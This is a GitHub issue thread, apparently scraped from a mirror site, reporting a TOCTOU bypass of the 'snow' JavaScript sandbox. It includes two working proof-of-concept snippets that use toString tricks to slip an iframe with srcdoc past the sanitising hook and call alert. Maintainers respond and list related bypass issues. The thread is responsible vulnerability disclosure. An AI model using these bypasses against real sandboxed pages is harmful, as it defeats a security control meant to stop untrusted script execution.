Comments (3)
The hook in inserters.js
can be bypassed similarly (TOCTOU), to avoid ERR_HTML_FRAMES_SRCDOC_BLOCKED
when inserting a html string containing an iframe with srcdoc:
before(args); // will operate on <u>legit html!</u>
const ret = Function.prototype.apply.call(native, this, args); // will operate on <iframe id=xxx srcdoc="<iframe>"></iframe>
after(args, element);
class b extends HTMLElement {
constructor() {
super();
};
fetched=false;
toString() {
if(this.fetched){
return '<iframe id=xxx srcdoc="<iframe>"></iframe>';
}else{
return this.fetched='<u>legit html!</u>';
}
};
};
customElements.define('x-foo', b);
document.documentElement.insertAdjacentHTML("beforeend",document.createElement('x-foo'));
setTimeout(e=>{xxx.contentWindow.frames[0].alert(1)}, 1000);
from snow.
Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)
Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html
Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.
from snow.
Very nice, very creative and well explained - thank you @avlidienbrunn!
Did some research, not gonna be able to address this atm, leaving some extra conclusions for now:
a = document.createElement('a');
top.xxx = 0;
a.toString = () => {
console.log(top.xxx);
if (top.xxx === 1) {
return '<iframe srcdoc="<iframe>"></iframe>';
}
top.xxx++;
return '<legit>xxx</legit>';
}
document.body.innerHTML = a;
setTimeout(() => window[0][0].alert('bypass'), 101)
would also work, because snow isn't well prepared for actual DOM nodes passed to HTML sinks...
(AM OPEN FOR MITIGATION IDEAS/THOUGHTS!)
from snow.
Related Issues (20)
- [WIP] How can we steer away from relying on CSP for security?
- Snow can be bypassed with iframes and srcdoc HOT 1
- Snow can be bypassed with Document.prototype.open HOT 2
- URL is hooked but webkitURL is not HOT 1
- Snow can be bypassed with inline script HOT 4
- Snow can by bypassed with race condition HOT 1
- Blob validation in Snow can be bypassed with native object copy HOT 2
- Snow can be bypassed with opener.alert() HOT 1
- Snow can by bypassed with Prototype Pollution HOT 1
- Snow can be bypassed with declarative shadow DOM passed as object instead of string HOT 1
- Snow can by bypassed with polluting NodeList.prototype.length HOT 2
- Snow can be bypassed with native Prototype Pollution HOT 1
- Snow can be bypassed with meta and the HTML sanitizer HOT 1
- Snow can be bypassed with nested cross-origin frames HOT 2
- Snow can be bypassed with forms and buttons formAction HOT 1
- Snow can be bypassed with location.replace HOT 3
- report from twitter HOT 1
- Snow can be bypassed by creating a Blob URI inside a worker HOT 7
- Snow can be bypassed using the Response.prototype.blob function HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from snow.